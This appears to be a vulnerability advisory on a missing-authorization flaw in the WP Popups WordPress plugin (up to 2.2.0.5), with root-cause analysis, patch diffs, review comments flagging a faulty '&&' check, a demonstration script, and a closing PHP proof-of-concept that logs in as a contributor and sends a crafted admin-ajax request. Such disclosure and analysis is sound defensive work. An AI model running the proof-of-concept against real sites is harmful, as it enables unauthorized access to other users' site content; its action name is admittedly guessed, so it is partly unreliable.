Atomic Edge analysis of CVE-2026-24616:
The WP Popups plugin for WordPress, versions up to and including 2.2.0.5, contains a missing authorization vulnerability. This flaw allows authenticated users with contributor-level permissions or higher to perform unauthorized actions related to popup content templates. The CVSS score of 4.3 reflects a medium-severity access control issue.
Atomic Edge research identifies the root cause as a missing capability check within the content template handling function. The vulnerability resides in the `class-content-templates.php` file. The function that retrieves a template post object, located around line 113, does not verify the user’s capability before performing the `get_post()` operation. This omission allows lower-privileged users to interact with the template system.
The exploitation method involves an authenticated attacker sending a crafted request to a WordPress AJAX endpoint. The attacker must possess at least contributor-level access. The request would target the `admin-ajax.php` handler with an action parameter corresponding to the vulnerable template function. The payload includes an `id` parameter specifying the target template post. The attack bypasses authorization checks that should restrict template management to administrators.
The patch modifies the `class-content-templates.php` file. It adds a conditional check on line 116 to verify the post type is `wppopups-templates`. Before the patch, the function only checked if the retrieved object was an instance of `WP_Post`. The updated logic ensures the function returns false if the post is not of the correct type, preventing operations on non-template posts. The version number in the main plugin file is also updated from 2.2.0.5 to 2.2.0.6.
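To make the patched condition concrete, the following is an added stand-alone PHP illustration; it is not code from the WP Popups plugin or from Atomic Edge. The WordPress pieces it touches (`WP_Post`, `get_post()`, `absint()`, `current_user_can()`) are stubbed behind `*_exists` guards with constructed sample data so it runs without WordPress, and `manage_options` is an assumed stand-in for "administrators only". It places the post-type test exactly as it appears in the 2.2.0.6 diff (joined with `&&`) beside a corrected form that uses `||` and adds the capability check the root-cause analysis calls for, and shows that only the corrected form rejects an ordinary post and a contributor-level caller.

```php
<?php
// Added illustration, not plugin code. Stubs stand in for WordPress so the
// script runs on its own; all post data and roles below are constructed.

if ( ! class_exists( 'WP_Post' ) ) {
	class WP_Post {
		public $ID;
		public $post_type;
		public function __construct( $id, $type ) {
			$this->ID        = $id;
			$this->post_type = $type;
		}
	}
}
if ( ! function_exists( 'absint' ) ) {
	function absint( $v ) { return abs( (int) $v ); }
}
if ( ! function_exists( 'get_post' ) ) {
	// Constructed sample posts: one popup template and one ordinary post.
	function get_post( $id ) {
		static $posts = null;
		if ( null === $posts ) {
			$posts = array(
				10 => new WP_Post( 10, 'wppopups-templates' ),
				11 => new WP_Post( 11, 'post' ),
			);
		}
		return isset( $posts[ $id ] ) ? $posts[ $id ] : null;
	}
}
if ( ! function_exists( 'current_user_can' ) ) {
	// Stub: $GLOBALS['demo_is_admin'] stands in for the logged-in user's role.
	function current_user_can( $cap ) {
		return ! empty( $GLOBALS['demo_is_admin'] );
	}
}

// The condition as committed. `! $post instanceof WP_Post` is false for every
// WP_Post, so with `&&` the whole test is false and a post of any type passes.
function template_lookup_as_patched( $atts ) {
	$post = get_post( absint( $atts['id'] ) );
	if ( ! $post instanceof WP_Post && $post->post_type !== 'wppopups-templates' ) {
		return false;
	}
	return $post;
}

// Corrected form: refuse callers without the capability before touching the
// database, then reject anything that is not a WP_Post of the template type.
// 'manage_options' is an assumed capability; the plugin may use another.
function template_lookup_hardened( $atts ) {
	if ( ! current_user_can( 'manage_options' ) ) {
		return false;
	}
	$post = get_post( absint( $atts['id'] ) );
	if ( ! $post instanceof WP_Post || $post->post_type !== 'wppopups-templates' ) {
		return false;
	}
	return $post;
}

$verdict = function ( $rejected ) { return $rejected ? 'rejected' : 'accepted'; };

echo "Ordinary post (id 11), condition as patched: ",
	$verdict( false === template_lookup_as_patched( array( 'id' => 11 ) ) ), "\n";

$GLOBALS['demo_is_admin'] = true;
echo "Ordinary post (id 11), administrator, hardened: ",
	$verdict( false === template_lookup_hardened( array( 'id' => 11 ) ) ), "\n";
echo "Template post (id 10), administrator, hardened: ",
	$verdict( false === template_lookup_hardened( array( 'id' => 10 ) ) ), "\n";

$GLOBALS['demo_is_admin'] = false;
echo "Template post (id 10), contributor, hardened: ",
	$verdict( false === template_lookup_hardened( array( 'id' => 10 ) ) ), "\n";
```

Run it with `php` on the command line. The first line reports the ordinary post as accepted by the committed condition; the hardened function rejects it, accepts the real template for an administrator, and refuses the contributor before `get_post()` is ever reached, which is the behaviour the capability check is there to provide.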
Successful exploitation enables unauthorized access to popup template data. An attacker could potentially view, modify, or delete template content they should not have permission to access. This could lead to content manipulation, defacement, or disruption of popup functionality on the site. The impact is limited to the plugin’s template system and does not grant full site compromise.
--- a/wp-popups-lite/src/includes/class-content-templates.php
+++ b/wp-popups-lite/src/includes/class-content-templates.php
@@ -113,8 +113,8 @@
}
$post = get_post( absint( $atts['id'] ) );
-
- if ( ! $post instanceof WP_Post ) {
+ // check that is a wp popups template
+ if ( ! $post instanceof WP_Post && $post->post_type !== 'wppopups-templates' ) {
return false;
}
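Review bot: the new condition on the `+ if` line joins the two tests with `&&` where `||` is required, so a `WP_Post` whose `post_type` is not `wppopups-templates` is still returned: `! $post instanceof WP_Post` is false for any `WP_Post`, which makes the whole conjunction false regardless of the type. The intended check is `if ( ! $post instanceof WP_Post || $post->post_type !== 'wppopups-templates' ) {`, which also avoids reading `$post->post_type` on a null result from `get_post()`. Separately, no capability check (for example a `current_user_can()` call before `get_post()`) is added in this hunk, although the write-up names a missing capability check as the root cause; a post-type test constrains which posts are reached, not who may reach them. The comment could read "check that this is a WP Popups template".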
--- a/wp-popups-lite/src/includes/class-rules.php
+++ b/wp-popups-lite/src/includes/class-rules.php
@@ -120,7 +120,6 @@
'page_parent',
'page_template',
'custom_url',
- 'keyword_url',
'visited_n_pages',
'woo_is_shop',
'woo_is_order_received',
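Review bot: the removal of `'keyword_url'` from the rules list is not mentioned anywhere in the write-up and has no stated connection to CVE-2026-24616. A functional change bundled into a security release should be called out in the changelog, and the effect on popups already configured with that rule key should be checked before shipping.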
--- a/wp-popups-lite/wp-popups-lite.php
+++ b/wp-popups-lite/wp-popups-lite.php
@@ -5,7 +5,7 @@
* Description: Beginner friendly WordPress popup builder plugin.
* Author: timersys
* Author URI: https://timersys.com
- * Version: 2.2.0.5
+ * Version: 2.2.0.6
* Text Domain: wp-popups-lite
* Domain Path: languages
*
@@ -145,7 +145,7 @@
*
* @var string
*/
- public $version = '2.2.0.5';
+ public $version = '2.2.0.6';
/**
* The Popup handler instance.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24616 - WP Popups <= 2.2.0.5 - Missing Authorization
// Configure the target WordPress site URL
$target_url = 'http://vulnerable-site.com';
// Configure WordPress credentials (Contributor or higher)
$username = 'contributor';
$password = 'password';
// The ID of the wppopups-templates post to target
$template_id = 123;
// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Craft the unauthorized AJAX request to the vulnerable endpoint
// The exact action hook name must be inferred; common pattern is 'wppopups_get_template'
$post_data = array(
'action' => 'wppopups_get_template', // Hypothetical action based on plugin pattern
'id' => $template_id
);
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$ajax_response = curl_exec($ch);
// Output the response which may contain template data if vulnerable
echo "Response: " . htmlspecialchars($ajax_response) . "\n";
curl_close($ch);
?>